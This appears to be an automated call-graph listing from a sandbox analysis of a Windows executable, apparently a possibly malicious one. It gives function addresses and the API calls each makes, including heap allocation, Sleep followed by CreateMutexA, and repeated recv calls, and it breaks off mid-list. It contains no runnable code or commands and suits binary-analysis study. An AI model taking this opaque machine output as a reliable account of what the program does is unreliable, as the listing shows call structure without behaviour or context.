10535->10536 10537 638453 10536->10537 10538 636c5a ___std_exception_copy RtlAllocateHeap 10537->10538 10538->10540 10540->10454 10542 63825a 10541->10542 10543 63779f RtlAllocateHeap 10542->10543 10544 638297 10543->10544 10591 63d3c8 10544->10591 10546 63830d 10546->10454 10548 638420 RtlAllocateHeap 10547->10548 10549 63861b 10548->10549 10549->10454 10551 63875d __floor_pentium4 10550->10551 10553 638707 10550->10553 10551->10456 10552 63c88e __cftof 4 API calls 10552->10553 10553->10551 10553->10552 10557 63c733 10554->10557 10558 63c743 10557->10558 10559 63c781 10558->10559 10560 63c76d 10558->10560 10569 63c748 10558->10569 10562 63690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10559->10562 10561 6375f6 __dosmaperr RtlAllocateHeap 10560->10561 10563 63c772 10561->10563 10564 63c78c 10562->10564 10565 636c5a ___std_exception_copy RtlAllocateHeap 10563->10565 10566 63c79c 10564->10566 10570 63c7c8 __cftof 10564->10570 10565->10569 10567 642b7d __cftof RtlAllocateHeap 10566->10567 10568 63c7b1 10567->10568 10568->10569 10572 6375f6 __dosmaperr RtlAllocateHeap 10568->10572 10569->10519 10574 63c7de __cftof 10570->10574 10577 63c815 __cftof 10570->10577 10571 6375f6 __dosmaperr RtlAllocateHeap 10571->10569 10572->10569 10573 6375f6 __dosmaperr RtlAllocateHeap 10575 63c87f 10573->10575 10574->10569 10574->10571 10576 636c5a ___std_exception_copy RtlAllocateHeap 10575->10576 10576->10569 10577->10569 10577->10573 10579 6377c3 10578->10579 10580 6377b4 10578->10580 10582 6377b9 10579->10582 10583 63b04b __cftof RtlAllocateHeap 10579->10583 10581 6375f6 __dosmaperr RtlAllocateHeap 10580->10581 10581->10582 10582->10540 10584 6377ea 10583->10584 10585 637801 10584->10585 10588 637a33 10584->10588 10587 63adf5 __freea RtlAllocateHeap 10585->10587 10587->10582 10589 63adf5 __freea RtlAllocateHeap 10588->10589 10590 637a42 10589->10590 10590->10585 10592 63d3d8 10591->10592 10593 63d3ee 10591->10593 10594 6375f6 __dosmaperr RtlAllocateHeap 10592->10594 10593->10592 10597 63d400 10593->10597 10595 63d3dd 10594->10595 10596 636c5a ___std_exception_copy RtlAllocateHeap 10595->10596 10598 63d3e7 10596->10598 10600 63d439 10597->10600 10601 63d467 10597->10601 10598->10546 10599 63d485 10604 63d4e4 10599->10604 10605 63d4ae 10599->10605 10612 63d2ff 10600->10612 10601->10599 10602 63d48a 10601->10602 10617 63cbdf 10602->10617 10645 63cef8 10604->10645 10607 63d4b3 10605->10607 10608 63d4cc 10605->10608 10628 63d23e 10607->10628 10638 63d0e2 10608->10638 10613 63d315 10612->10613 10614 63d320 10612->10614 10613->10598 10615 63a1f1 ___std_exception_copy RtlAllocateHeap 10614->10615 10616 63d37b ___std_exception_copy 10615->10616 10616->10598 10618 63cbf1 10617->10618 10619 63690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10618->10619 10620 63cc05 10619->10620 10621 63cc21 10620->10621 10622 63cc0d 10620->10622 10624 63cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10621->10624 10627 63cc1c __alldvrm __cftof _strrchr 10621->10627 10623 6375f6 __dosmaperr RtlAllocateHeap 10622->10623 10625 63cc12 10623->10625 10624->10627 10626 636c5a ___std_exception_copy RtlAllocateHeap 10625->10626 10626->10627 10627->10598 10629 6431a8 RtlAllocateHeap 10628->10629 10630 63d26c 10629->10630 10631 642c47 RtlAllocateHeap 10630->10631 10632 63d29e 10631->10632 10633 63d2de 10632->10633 10634 63d2b7 10632->10634 10636 63d2a5 10632->10636 10635 63cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10633->10635 10637 63d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10634->10637 10635->10636 10636->10598 10637->10636 10639 6431a8 RtlAllocateHeap 10638->10639 10640 63d10f 10639->10640 10641 642c47 RtlAllocateHeap 10640->10641 10642 63d147 10641->10642 10643 63d14e 10642->10643 10644 63d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10642->10644 10643->10598 10644->10643 10646 63cf10 10645->10646 10647 6431a8 RtlAllocateHeap 10646->10647 10648 63cf29 10647->10648 10649 642c47 RtlAllocateHeap 10648->10649 10651 63cf6e 10649->10651 10650 63cf75 10650->10598 10651->10650 10652 63cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10651->10652 10652->10650 10654 60907f 10653->10654 10655 617a00 RtlAllocateHeap 10654->10655 10656 60908f 10655->10656 10657 605c10 4 API calls 10656->10657 10658 60909a 10657->10658 10659 6180c0 RtlAllocateHeap 10658->10659 10660 6090ec 10659->10660 10661 618220 RtlAllocateHeap 10660->10661 10662 6090fe shared_ptr 10661->10662 10663 60917e shared_ptr __floor_pentium4 10662->10663 10664 636c6a RtlAllocateHeap 10662->10664 10663->10188 10665 6091aa 10664->10665 10667 618292 10666->10667 10668 618248 10666->10668 10672 6182a1 10667->10672 10673 618f40 RtlAllocateHeap 10667->10673 10668->10667 10669 618251 10668->10669 10695 619280 10669->10695 10671 61825a 10671->10192 10672->10192 10673->10672 10675 618f6b 10674->10675 10676 61908e 10674->10676 10680 618fb2 10675->10680 10681 618fdc 10675->10681 10677 619270 RtlAllocateHeap 10676->10677 10678 619093 10677->10678 10679 602480 RtlAllocateHeap 10678->10679 10687 618fc3 __cftof 10679->10687 10680->10678 10682 618fbd 10680->10682 10685 61d3e2 RtlAllocateHeap 10681->10685 10681->10687 10684 61d3e2 RtlAllocateHeap 10682->10684 10683 636c6a RtlAllocateHeap 10686 61909d 10683->10686 10684->10687 10685->10687 10688 6190b8 10686->10688 10690 602480 Concurrency::cancel_current_task 10686->10690 10691 6190be 10686->10691 10687->10683 10693 61904c shared_ptr __cftof 10687->10693 10689 61d3e2 RtlAllocateHeap 10688->10689 10689->10691 10692 6338af ___std_exception_copy RtlAllocateHeap 10690->10692 10691->10183 10694 6024c3 10692->10694 10693->10183 10694->10183 10696 619294 10695->10696 10697 6192a5 __cftof 10696->10697 10700 6194e0 10696->10700 10697->10671 10699 61932b 10699->10671 10701 619619 10700->10701 10703 61950b 10700->10703 10702 619270 RtlAllocateHeap 10701->10702 10704 61961e 10702->10704 10706 619552 10703->10706 10707 619579 10703->10707 10705 602480 RtlAllocateHeap 10704->10705 10713 619563 __cftof 10705->10713 10706->10704 10708 61955d 10706->10708 10710 61d3e2 RtlAllocateHeap 10707->10710 10707->10713 10709 61d3e2 RtlAllocateHeap 10708->10709 10709->10713 10710->10713 10711 636c6a RtlAllocateHeap 10712 619628 shared_ptr 10711->10712 10712->10699 10713->10711 10714 6195e1 shared_ptr __cftof 10713->10714 10714->10699 10738 603840 10739 6038f6 10738->10739 10740 60385f 10738->10740 10740->10739 10741 603920 10740->10741 10744 6038cd shared_ptr 10740->10744 10746 60391b 10740->10746 10748 6191e0 10741->10748 10743 603925 10745 617d50 RtlAllocateHeap 10744->10745 10745->10739 10747 636c6a RtlAllocateHeap 10746->10747 10747->10741 10749 61c1b9 RtlAllocateHeap 10748->10749 10750 6191ea 10749->10750 10750->10743 10751 603440 10756 602b30 10751->10756 10753 60344f Concurrency::cancel_current_task 10754 6338af ___std_exception_copy RtlAllocateHeap 10753->10754 10755 603483 10754->10755 10757 6338af ___std_exception_copy RtlAllocateHeap 10756->10757 10758 602b68 __floor_pentium4 10757->10758 10758->10753 10779 603c47 10780 603c51 10779->10780 10783 603c5f 10780->10783 10795 6032d0 10780->10795 10781 603c68 10783->10781 10814 603810 10783->10814 10818 61c6ac 10795->10818 10797 60336b 10824 61c26a 10797->10824 10799 603314 10799->10797 10800 60333c __Mtx_unlock 10799->10800 10821 61bd4c 10799->10821 10802 61c26a 5 API calls 10800->10802 10803 603350 __floor_pentium4 10800->10803 10804 603377 10802->10804 10803->10783 10805 61c6ac GetSystemTimePreciseAsFileTime 10804->10805 10806 6033af 10805->10806 10807 61c26a 5 API calls 10806->10807 10808 6033b6 __Cnd_broadcast 10806->10808 10807->10808 10809 61c26a 5 API calls 10808->10809 10810 6033d7 __Mtx_unlock 10808->10810 10809->10810 10811 61c26a 5 API calls 10810->10811 10812 6033eb 10810->10812 10813 60340e 10811->10813 10812->10783 10813->10783 10815 60381c 10814->10815 10897 602440 10815->10897 10828 61c452 10818->10828 10820 61c6b9 10820->10799 10845 61bb72 10821->10845 10823 61bd5c 10823->10799 10825 61c292 10824->10825 10826 61c274 10824->10826 10825->10825 10826->10825 10851 61c297 10826->10851 10829 61c4a8 10828->10829 10831 61c47a __floor_pentium4 10828->10831 10829->10831 10834 61cf6b 10829->10834 10831->10820 10832 61c4fd __Xtime_diff_to_millis2 10832->10831 10833 61cf6b _xtime_get GetSystemTimePreciseAsFileTime 10832->10833 10833->10832 10835 61cf7a 10834->10835 10837 61cf87 __aulldvrm 10834->10837 10835->10837 10838 61cf44 10835->10838 10837->10832 10841 61cbea 10838->10841 10842 61cbfb GetSystemTimePreciseAsFileTime 10841->10842 10844 61cc07 10841->10844 10842->10844 10844->10837 10846 61bb9c 10845->10846 10847 61cf6b _xtime_get GetSystemTimePreciseAsFileTime 10846->10847 10850 61bba4 __Xtime_diff_to_millis2 __floor_pentium4 10846->10850 10848 61bbcf __Xtime_diff_to_millis2 10847->10848 10849 61cf6b _xtime_get GetSystemTimePreciseAsFileTime 10848->10849 10848->10850 10849->10850 10850->10823 10856 602ae0 10851->10856 10853 61c2ae 10863 61c1ff 10853->10863 10855 61c2bf Concurrency::cancel_current_task 10857 61bedf InitOnceExecuteOnce 10856->10857 10858 602af4 __dosmaperr 10857->10858 10858->10853 10859 63a671 __cftof 4 API calls 10858->10859 10860 636ccc 10859->10860 10861 638bec __cftof 4 API calls 10860->10861 10862 636cf6 10861->10862 10864 61c20b __EH_prolog3_GS 10863->10864 10865 6180c0 RtlAllocateHeap 10864->10865 10866 61c23d 10865->10866 10871 6026b0 10866->10871 10868 61c252 10888 617970 10868->10888 10870 61c25a 10870->10855 10872 617a00 RtlAllocateHeap 10871->10872 10873 602702 10872->10873 10874 602725 10873->10874 10875 618f40 RtlAllocateHeap 10873->10875 10876 618f40 RtlAllocateHeap 10874->10876 10877 60278e 10874->10877 10875->10874 10876->10877 10878 6027ed shared_ptr 10877->10878 10880 6028b8 10877->10880 10879 6338af ___std_exception_copy RtlAllocateHeap 10878->10879 10883 60284b 10879->10883 10881 636c6a RtlAllocateHeap 10880->10881 10881->10883 10882 60287a shared_ptr __floor_pentium4 10882->10868 10883->10882 10884 636c6a RtlAllocateHeap 10883->10884 10885 6028c2 10884->10885 10893 633912 10885->10893 10887 6028e5 shared_ptr 10887->10868 10889 61797b 10888->10889 10890 617996 shared_ptr 10888->10890 10889->10890 10891 636c6a RtlAllocateHeap 10889->10891 10890->10870 10892 6179ba 10891->10892 10894 633926 10893->10894 10895 63391f 10893->10895 10894->10887 10896 638ba3 ___std_exception_destroy RtlAllocateHeap 10895->10896 10896->10894 10900 61b5d6 10897->10900 10899 602472 10901 61b5f1 Concurrency::cancel_current_task 10900->10901 10902 638bec __cftof 4 API calls 10901->10902 10904 61b658 __cftof __floor_pentium4 10901->10904 10903 61b69f 10902->10903 10904->10899 10905 636a44 10906 636a52 10905->10906 10907 636a5c 10905->10907 10918 63b655 10906->10918 10923 63698d 10907->10923 10910 636a59 10911 636a76 10926 6368ed 10911->10926 10914 63b655 RtlAllocateHeap 10915 636a8a 10914->10915 10916 636aa8 10915->10916 10917 63adf5 __freea RtlAllocateHeap 10915->10917 10917->10916 10919 63b662 10918->10919 10920 63b679 10919->10920 10929 6375c0 10919->10929 10920->10910 10924 63690a __cftof 4 API calls 10923->10924 10925 63699f 10924->10925 10925->10911 10937 63683b 10926->10937 10934 6375e3 10929->10934 10931 6375cb __dosmaperr 10932 6375f6 __dosmaperr RtlAllocateHeap 10931->10932 10933 6375de 10932->10933 10933->10910 10935 63a7c8 __dosmaperr RtlAllocateHeap 10934->10935 10936 6375e8 10935->10936 10936->10931 10938 636863 10937->10938 10939 636849 10937->10939 10940 63686a 10938->10940 10943 636889 __cftof 10938->10943 10950 6369cc 10939->10950 10949 636853 10940->10949 10954 6369e6 10940->10954 10944 6369e6 RtlAllocateHeap 10943->10944 10945 63689f __cftof 10943->10945 10944->10945 10946 6375c0 __dosmaperr RtlAllocateHeap 10945->10946 10945->10949 10947 6368ab 10946->10947 10948 6375f6 __dosmaperr RtlAllocateHeap 10947->10948 10948->10949 10949->10914 10949->10915 10951 6369d7 10950->10951 10952 6369df 10950->10952 10953 63adf5 __freea RtlAllocateHeap 10951->10953 10952->10949 10953->10952 10955 6369cc RtlAllocateHeap 10954->10955 10956 6369f4 10955->10956 10959 636a25 10956->10959 10960 63b04b __cftof RtlAllocateHeap 10959->10960 10961 636a05 10960->10961 10961->10949 10967 61be50 10970 61bd8b 10967->10970 10969 61be66 Concurrency::cancel_current_task std::_Throw_future_error 10971 6022e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10970->10971 10972 61bd9f 10971->10972 10972->10969 9674 60a856 9675 60a870 9674->9675 9676 60a892 shared_ptr 9674->9676 9675->9676 9677 60a94e 9675->9677 9683 6180c0 9676->9683 9679 60a953 Sleep CreateMutexA 9677->9679 9698 636c6a 9677->9698 9682 60a98e 9679->9682 9681 60a903 9686 6180de 9683->9686 9688 618104 9683->9688 9684 6181ee 9706 619270 9684->9706 9686->9681 9687 6181f3 9709 602480 9687->9709 9688->9684 9690 618158 9688->9690 9691 61817d 9688->9691 9690->9687 9701 61d3e2 9690->9701 9693 61d3e2 RtlAllocateHeap 9691->9693 9696 618169 __cftof 9691->9696 9693->9696 9695 636c6a RtlAllocateHeap 9695->9684 9696->9695 9697 6181d0 shared_ptr 9696->9697 9697->9681 9699 636bf6 ___std_exception_copy RtlAllocateHeap 9698->9699 9700 636c79 ___std_exception_copy 9699->9700 9702 602480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9701->9702 9705 61d401 Concurrency::cancel_current_task 9702->9705 9713 6338af 9702->9713 9705->9696 9802 61c1b9 9706->9802 9710 60248e Concurrency::cancel_current_task 9709->9710 9711 6338af ___std_exception_copy RtlAllocateHeap 9710->9711 9712 6024c3 9711->9712 9714 6338bc ___std_exception_copy 9713->9714 9718 6024c3 9713->9718 9717 6338e9 9714->9717 9714->9718 9719 63a1f1 9714->9719 9728 638ba3 9717->9728 9718->9696 9720 63a20c 9719->9720 9721 63a1fe 9719->9721 9731 6375f6 9720->9731 9721->9720 9724 63a223 9721->9724 9723 63a214 9734 636c5a 9723->9734 9726 63a21e 9724->9726 9727 6375f6 __dosmaperr RtlAllocateHeap 9724->9727 9726->9717 9727->9723 9729 63adf5 __freea RtlAllocateHeap 9728->9729 9730 638bbb 9729->9730 9730->9718 9737 63a7c8 9731->9737 9796 636bf6 9734->9796 9736 636c66 9736->9726 9738 63a7d2 __dosmaperr 9737->9738 9739 6375fb 9738->9739 9748 63d82f 9738->9748 9739->9723 9741 63a813 __dosmaperr 9742 63a853 9741->9742 9743 63a81b __dosmaperr 9741->9743 9756 63a49f 9742->9756 9752 63adf5 9743->9752 9747 63adf5 __freea RtlAllocateHeap 9747->9739 9751 63d83c __dosmaperr 9748->9751 9749 63d867 RtlAllocateHeap 9750 63d87a __dosmaperr 9749->9750 9749->9751 9750->9741 9751->9749 9751->9750 9753 63ae00 9752->9753 9755 63ae1b __dosmaperr 9752->9755 9754 6375f6 __dosmaperr RtlAllocateHeap 9753->9754 9753->9755 9754->9755 9755->9739 9757 63a50d __dosmaperr 9756->9757 9760 63a445 9757->9760 9759 63a536 9759->9747 9761 63a451 __dosmaperr 9760->9761 9764 63a626 9761->9764 9763 63a473 __dosmaperr 9763->9759 9765 63a635 __dosmaperr 9764->9765 9767 63a65c __dosmaperr 9764->9767 9765->9767 9768 63f35f 9765->9768 9767->9763 9770 63f3df 9768->9770 9771 63f375 9768->9771 9769 63f4d0 __dosmaperr RtlAllocateHeap 9776 63f43b 9769->9776 9772 63adf5 __freea RtlAllocateHeap 9770->9772 9795 63f42d 9770->9795 9771->9770 9777 63adf5 __freea RtlAllocateHeap 9771->9777 9778 63f3a8 9771->9778 9773 63f401 9772->9773 9774 63adf5 __freea RtlAllocateHeap 9773->9774 9779 63f414 9774->9779 9775 63adf5 __freea RtlAllocateHeap 9780 63f3d4 9775->9780 9781 63f49b 9776->9781 9787 63adf5 RtlAllocateHeap __freea 9776->9787 9782 63f39d 9777->9782 9783 63adf5 __freea RtlAllocateHeap 9778->9783 9794 63f3ca 9778->9794 9784 63adf5 __freea RtlAllocateHeap 9779->9784 9785 63adf5 __freea RtlAllocateHeap 9780->9785 9786 63adf5 __freea RtlAllocateHeap 9781->9786 9788 63ef3c ___free_lconv_mon RtlAllocateHeap 9782->9788 9789 63f3bf 9783->9789 9790 63f422 9784->9790 9785->9770 9791 63f4a1 9786->9791 9787->9776 9788->9778 9792 63f03a __dosmaperr RtlAllocateHeap 9789->9792 9793 63adf5 __freea RtlAllocateHeap 9790->9793 9791->9767 9792->9794 9793->9795 9794->9775 9795->9769 9797 63a7c8 __dosmaperr RtlAllocateHeap 9796->9797 9798 636c01 ___std_exception_copy 9797->9798 9799 636c0f 9798->9799 9800 636bf6 ___std_exception_copy RtlAllocateHeap 9798->9800 9799->9736 9801 636c66 9800->9801 9801->9736 9805 61c123 9802->9805 9804 61c1ca Concurrency::cancel_current_task 9808 6022e0 9805->9808 9807 61c135 9807->9804 9809 6338af ___std_exception_copy RtlAllocateHeap 9808->9809 9810 602317 __floor_pentium4 9809->9810 9810->9807 10983 601020 10984 6180c0 RtlAllocateHeap 10983->10984 10985 601031 10984->10985 10986 61d64e RtlAllocateHeap 10985->10986 10987 60103b 10986->10987 9811 636629 9814 6364c7 9811->9814 9815 6364d5 __cftof 9814->9815 9816 636520 9815->9816 9819 63652b 9815->9819 9818 63652a 9825 63a302 GetPEB 9819->9825 9821 636535 9822 63653a GetPEB 9821->9822 9824 63654a __cftof 9821->9824 9822->9824 9823 636562 ExitProcess 9824->9823 9826 63a31c __cftof 9825->9826 9826->9821 9827 63d82f 9830 63d83c __dosmaperr 9827->9830 9828 63d867 RtlAllocateHeap 9829 63d87a __dosmaperr 9828->9829 9828->9830 9830->9828 9830->9829 11049 602e00 11050 602e28 11049->11050 11053 61c68b 11050->11053 11056 61c3d5 11053->11056 11055 602e33 11057 61c3e1 11056->11057 11058 61c3eb 11056->11058 11059 61c3be 11057->11059 11061 61c39e 11057->11061 11058->11055 11069 61cd0a 11059->11069 11061->11058 11065 61ccd5 11061->11065 11062 61c3d0 11062->11055 11066 61cce3 InitializeCriticalSectionEx 11065->11066 11067 61c3b7 11065->11067 11066->11067 11067->11055 11070 61cd1f RtlInitializeConditionVariable 11069->11070 11070->11062 11071 601000 11072 61d64e RtlAllocateHeap 11071->11072 11073 60100a 11072->11073 11090 60a418 11091 60a420 shared_ptr 11090->11091 11092 60a93f 11091->11092 11093 60a4f3 shared_ptr 11091->11093 11094 636c6a RtlAllocateHeap 11092->11094 11096 6180c0 RtlAllocateHeap 11093->11096 11095 60a944 11094->11095 11097 636c6a RtlAllocateHeap 11095->11097 11098 60a903 11096->11098 11099 60a949 11097->11099 11100 60a94e 11099->11100 11101 636c6a RtlAllocateHeap 11099->11101 11102 60a953 Sleep CreateMutexA 11100->11102 11103 636c6a RtlAllocateHeap 11100->11103 11101->11100 11104 60a98e 11102->11104 11103->11102 11153 606ae9 11155 606b01 11153->11155 11154 6180c0 RtlAllocateHeap 11156 606bac 11154->11156 11155->11154 11158 606bbd shared_ptr 11155->11158 11157 619280 RtlAllocateHeap 11156->11157 11157->11158 11159 6180c0 RtlAllocateHeap 11158->11159 11160 606ce3 shared_ptr __floor_pentium4 11159->11160 11161 619ef0 11162 619f0c 11161->11162 11163 61c68b __Mtx_init_in_situ 2 API calls 11162->11163 11164 619f17 11163->11164 11165 6444f2 11166 6444ff 11165->11166 11168 64450c 11165->11168 11167 6375f6 __dosmaperr RtlAllocateHeap 11166->11167 11170 644504 11167->11170 11169 6375f6 __dosmaperr RtlAllocateHeap 11168->11169 11171 644518 11168->11171 11172 644539 11169->11172 11173 636c5a ___std_exception_copy RtlAllocateHeap 11172->11173 11173->11170 11189 602ec0 11190 602f06 11189->11190 11191 602f7e GetCurrentThreadId 11189->11191 11194 61c6ac GetSystemTimePreciseAsFileTime 11190->11194 11192 602f94 11191->11192 11193 602fef 11191->11193 11192->11193 11200 61c6ac GetSystemTimePreciseAsFileTime 11192->11200 11195 602f12 11194->11195 11196 602f1d 11195->11196 11197 60301e 11195->11197 11201 61d3e2 RtlAllocateHeap 11196->11201 11202 602f30 __Mtx_unlock 11196->11202 11198 61c26a 5 API calls 11197->11198 11199 603024 11198->11199 11203 61c26a 5 API calls 11199->11203 11204 602fb9 11200->11204 11201->11202 11202->11199 11205 602f6f 11202->11205 11203->11204 11206 61c26a 5 API calls 11204->11206 11207 602fc0 __Mtx_unlock 11204->11207 11205->11191 11205->11193 11206->11207 11208 61c26a 5 API calls 11207->11208 11209 602fd8 __Cnd_broadcast 11207->11209 11208->11209 11209->11193 11210 61c26a 5 API calls 11209->11210 11211 60303c 11210->11211 11212 61c6ac GetSystemTimePreciseAsFileTime 11211->11212 11222 603080 shared_ptr __Mtx_unlock 11212->11222 11213 6031c5 11214 61c26a 5 API calls 11213->11214 11215 6031cb 11214->11215 11216 61c26a 5 API calls 11215->11216 11217 6031d1 11216->11217 11218 61c26a 5 API calls 11217->11218 11219 603193 __Mtx_unlock 11218->11219 11220 6031a7 __floor_pentium4 11219->11220 11221 61c26a 5 API calls 11219->11221 11224 6031dd 11221->11224 11222->11213 11222->11215 11222->11220 11223 603132 GetCurrentThreadId 11222->11223 11223->11220 11225 60313b 11223->11225 11225->11220 11226 61c6ac GetSystemTimePreciseAsFileTime 11225->11226 11227 60315f 11226->11227 11227->11213 11227->11217 11227->11219 11228 61bd4c GetSystemTimePreciseAsFileTime 11227->11228 11228->11227 11229 60e0c0 recv 11230 60e122 recv 11229->11230 11231 60e157 recv 11230->11231 11233 60e191 11231->11233 11232 60e2b3 __floor_pentium4 11233->11232 11234 61c6ac GetSystemTimePreciseAsFileTime 11233->11234 11235 60e2ee 11234->11235 11236 61c26a 5 API calls 11235->11236 11237 60e358 11236->11237 11268 61d0c7 11270 61d0d7 11268->11270 11269 61d17f 11270->11269 11271 61d17b RtlWakeAllConditionVariable 11270->11271 11272 609adc 11273 609aea 11272->11273 11278 609afe shared_ptr 11272->11278 11274 60a917 11273->11274 11273->11278 11275 60a953 Sleep CreateMutexA 11274->11275 11276 636c6a RtlAllocateHeap 11274->11276 11277 60a98e 11275->11277 11276->11275 11279 617a00 RtlAllocateHeap 11278->11279 11280 609b74 11279->11280 11281 605c10 4 API calls 11280->11281 11282 609b7c 11281->11282 11295 608b30 11282->11295 11284 609b8d 11285 618220 RtlAllocateHeap 11284->11285 11286 609b9c 11285->11286 11287 617a00 RtlAllocateHeap 11286->11287 11288 609ca9 11287->11288 11289 605c10 4 API calls 11288->11289 11290 609cb1 11289->11290 11291 608b30 4 API calls 11290->11291 11292 609cc2 11291->11292 11293 618220 RtlAllocateHeap 11292->11293 11294 609cd1 11293->11294 11296 608b7c 11295->11296 11297 617a00 RtlAllocateHeap 11296->11297 11298 608b8c 11297->11298 11299 605c10 4 API calls 11298->11299 11300 608b97 11299->11300 11301 6180c0 RtlAllocateHeap 11300->11301 11302 608be3 11301->11302 11303 6180c0 RtlAllocateHeap 11302->11303 11304 608c35 11303->11304 11305 618220 RtlAllocateHeap 11304->11305 11308 608c47 shared_ptr 11305->11308 11306 608d01 shared_ptr __floor_pentium4 11306->11284 11307 636c6a RtlAllocateHeap 11309 608d2d 11307->11309 11308->11306 11308->11307 11310 617a00 RtlAllocateHeap 11309->11310 11311 608d8f 11310->11311 11312 605c10 4 API calls 11311->11312 11313 608d9a 11312->11313 11314 6180c0 RtlAllocateHeap 11313->11314 11315 608dec 11314->11315 11316 618220 RtlAllocateHeap 11315->11316 11318 608dfe shared_ptr 11316->11318 11317 608e7e shared_ptr __floor_pentium4 11317->11284 11318->11317 11319 636c6a RtlAllocateHeap 11318->11319 11320 608eaa 11319->11320 11321 617a00 RtlAllocateHeap 11320->11321 11322 608f0f 11321->11322 11323 605c10 4 API calls 11322->11323 11324 608f1a 11323->11324 11325 6180c0 RtlAllocateHeap 11324->11325 11326 608f6c 11325->11326 11327 618220 RtlAllocateHeap 11326->11327 11329 608f7e shared_ptr 11327->11329 11328 608ffe shared_ptr __floor_pentium4 11328->11284 11329->11328 11330 636c6a RtlAllocateHeap 11329->11330 11331 60902a 11330->11331 11372 6020a0 11373 61c68b __Mtx_init_in_situ 2 API calls 11372->11373 11374 6020ac 11373->11374 11375 61d64e RtlAllocateHeap 11374->11375 11376 6020b6 11375->11376 11377 6034a0 11378 6034aa 11377->11378 11379 6034ca shared_ptr 11377->11379 11378->11379 11380 636c6a RtlAllocateHeap 11378->11380 11381 6034f2 Concurrency::cancel_current_task shared_ptr 11380->11381 11382 605cad 11384 605caf 11382->11384 11383 605d17 shared_ptr __floor_pentium4 11384->11383 11385 636c6a RtlAllocateHeap 11384->11385 11386 605d47 __cftof 11385->11386 11386->11386 11387 6180c0 RtlAllocateHeap 11386->11387 11389 605e3e 11387->11389 11388 605ea6 shared_ptr __floor_pentium4 11389->11388 11390 636c6a RtlAllocateHeap 11389->11390 11391 605ed2 11390->11391 11392 605ffe shared_ptr __floor_pentium4 11391->11392 11393 636c6a RtlAllocateHeap 11391->11393 11394 60601b 11393->11394 11395 6180c0 RtlAllocateHeap 11394->11395 11396 606089 11395->11396 11397 6180c0 RtlAllocateHeap 11396->11397 11398 6060bd 11397->11398 11399 6180c0 RtlAllocateHeap 11398->11399 11400 6060ee 11399->11400 11401 6180c0 RtlAllocateHeap 11400->11401 11402 60611f 11401->11402 11403 6180c0 RtlAllocateHeap 11402->11403 11405 606150 11403->11405 11404 6065b1 shared_ptr __floor_pentium4 11405->11404 11406 636c6a RtlAllocateHeap 11405->11406 11407 6065dc 11406->11407 11408 617a00 RtlAllocateHeap 11407->11408 11409 6066a6 11408->11409 11410 605c10 4 API calls 11409->11410 11411 6066ac 11410->11411 11412 605c10 4 API calls 11411->11412 11413 6066b1 11412->11413 11414 6022c0 4 API calls 11413->11414 11415 6066c9 shared_ptr 11414->11415 11416 617a00 RtlAllocateHeap 11415->11416 11417 606732 11416->11417 11418 605c10 4 API calls 11417->11418 11419 60673d 11418->11419 11420 6022c0 4 API calls 11419->11420 11421 606757 shared_ptr 11420->11421 11422 606852 11421->11422 11424 617a00 RtlAllocateHeap 11421->11424 11427 605c10 4 API calls 11421->11427 11429 6022c0 4 API calls 11421->11429 11423 6180c0 RtlAllocateHeap 11422->11423 11425 60689c 11423->11425 11424->11421 11426 6180c0 RtlAllocateHeap 11425->11426 11428 6068e3 shared_ptr __floor_pentium4 11426->11428 11427->11421 11429->11421 11430 6042b0 11433 603ac0 11430->11433 11432 6042bb shared_ptr 11434 603af9 11433->11434 11435 636c6a RtlAllocateHeap 11434->11435 11438 603b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11434->11438 11436 603be6 11435->11436 11437 6032d0 6 API calls 11436->11437 11440 603c38 11436->11440 11437->11440 11438->11432 11439 6032d0 6 API calls 11441 603c5f 11439->11441 11440->11439 11440->11441 11442 603c68 11441->11442 11443 603810 4 API calls 11441->11443 11442->11432 11444 603cdb 11443->11444 11445 617d50 RtlAllocateHeap 11444->11445 11447 603d52 11444->11447 11445->11447 11446 61d3e2 RtlAllocateHeap 11448 603d84 11446->11448 11447->11446 11449 617d50 RtlAllocateHeap 11448->11449 11451 603e03 11448->11451 11449->11451 11450 603e9b shared_ptr 11450->11432 11451->11450 11452 636c6a RtlAllocateHeap 11451->11452 11453 603ec1 11452->11453 11454 609ab8 11456 609acc 11454->11456 11457 609b08 11456->11457 11458 617a00 RtlAllocateHeap 11457->11458 11459 609b74 11458->11459 11460 605c10 4 API calls 11459->11460 11461 609b7c 11460->11461 11462 608b30 4 API calls 11461->11462 11463 609b8d 11462->11463 11464 618220 RtlAllocateHeap 11463->11464 11465 609b9c 11464->11465 11466 617a00 RtlAllocateHeap 11465->11466 11467 609ca9 11466->11467 11468 605c10 4 API calls 11467->11468 11469 609cb1 11468->11469 11470 608b30 4 API calls 11469->11470 11471 609cc2 11470->11471 11472 618220 RtlAllocateHeap 11471->11472 11473 609cd1 11472->11473 11514 618680 11515 6186e0 11514->11515 11515->11515 11523 617760 11515->11523 11517 6186f9 11518 618f40 RtlAllocateHeap 11517->11518 11519 618714 11517->11519 11518->11519 11520 618f40 RtlAllocateHeap 11519->11520 11522 618769 11519->11522 11521 6187b1 11520->11521 11524 61777b 11523->11524 11536 617864 shared_ptr __cftof 11523->11536 11525 6178f1 11524->11525 11529 617811 11524->11529 11530 6177ea 11524->11530 11535 6177fb __cftof 11524->11535 11524->11536 11526 619270 RtlAllocateHeap 11525->11526 11527 6178f6 11526->11527 11528 602480 RtlAllocateHeap 11527->11528 11531 6178fb 11528->11531 11532 61d3e2 RtlAllocateHeap 11529->11532 11529->11535 11530->11527 11533 61d3e2 RtlAllocateHeap 11530->11533 11532->11535 11533->11535 11534 636c6a RtlAllocateHeap 11534->11525 11535->11534 11535->11536 11536->11517 11537 60a682 11538 60a68a shared_ptr 11537->11538 11539 60a949 11538->11539 11540 60a75d shared_ptr 11538->11540 11541 60a94e 11539->11541 11542 636c6a RtlAllocateHeap 11539->11542 11545 6180c0 RtlAllocateHeap 11540->11545 11543 60a953 Sleep CreateMutexA 11541->11543 11544 636c6a RtlAllocateHeap 11541->11544 11542->11541 11547 60a98e 11543->11547 11544->11543 11546 60a903 11545->11546 11548 603c8e 11549 603c98 11548->11549 11550 